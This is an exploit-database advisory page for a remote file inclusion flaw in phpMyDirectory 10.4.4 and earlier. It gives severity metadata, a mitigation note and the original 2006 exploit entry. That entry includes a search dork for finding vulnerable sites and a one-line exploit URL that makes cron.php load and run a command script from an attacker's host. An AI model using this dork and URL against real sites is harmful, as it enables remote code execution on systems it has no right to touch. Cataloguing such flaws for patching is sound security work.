header-logo
Suggest Exploit
vendor:
phpMyDirectory
by:
OLiBekaS
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phpMyDirectory
Affected Version From: phpMyDirectory <= 10.4.4
Affected Version To: phpMyDirectory <= 10.4.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpmydirectory:phpmydirectory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability

A vulnerability in phpMyDirectory <= 10.4.4 allows remote attackers to include arbitrary files via a URL in the ROOT_PATH parameter to cron.php.

Mitigation:

Upgrade to the latest version of phpMyDirectory or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
-
URL         : http://www.phpmydirectory.com/
-
Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-19]

Navigation

Suggest Exploit

Services By CQR